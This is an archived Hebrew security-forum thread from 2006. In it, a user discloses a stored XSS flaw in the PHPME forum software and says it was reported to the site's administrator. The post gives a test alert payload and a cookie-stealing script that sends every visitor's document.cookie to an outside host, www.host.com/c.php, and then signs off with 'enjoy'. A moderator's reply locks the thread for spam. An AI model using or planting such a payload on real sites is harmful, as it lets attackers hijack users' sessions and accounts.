ארכיון רד-בורד: PHPME

10/06/2006 12:52:05 Pr0T3cT10n

במערכת הפורומים PHPME נמצא באג XSS (Cross Site Scripting)
הבאג מאפשר לגנוב את העוגייה של כל משתמש אשר יכנס לאינדקס הפורומים, או לפורום שבו נוצרה ההודעה, או להודעה עצמה.
קוד Alert
קוד:
<script>alert("XSS Bug Found..By Pr0T3cT10n");</script>

קוד לגניבת הקוקיס:
קוד:
<script>window.location.href="http://www.host.com/c.php?c="+document.cookie+"";</script>

הבאג נמצא ע"י Pr0T3cT10n (ז"א אני).
הבאג דווח למנהל האתר.
דף הבית שלהם:
http://www.phpme.net/
תהנו.

10/06/2006 19:46:48 Trancer

הנושא ננעל עקב ספאם.
דרקולה ו-Pr0T3cT10n, יש לכם הודעות פרטיות/ICQ בשביל זה!

רד-בורד: ארכיון

ראשי > אבטחת מידע > PHPME - XSS Bug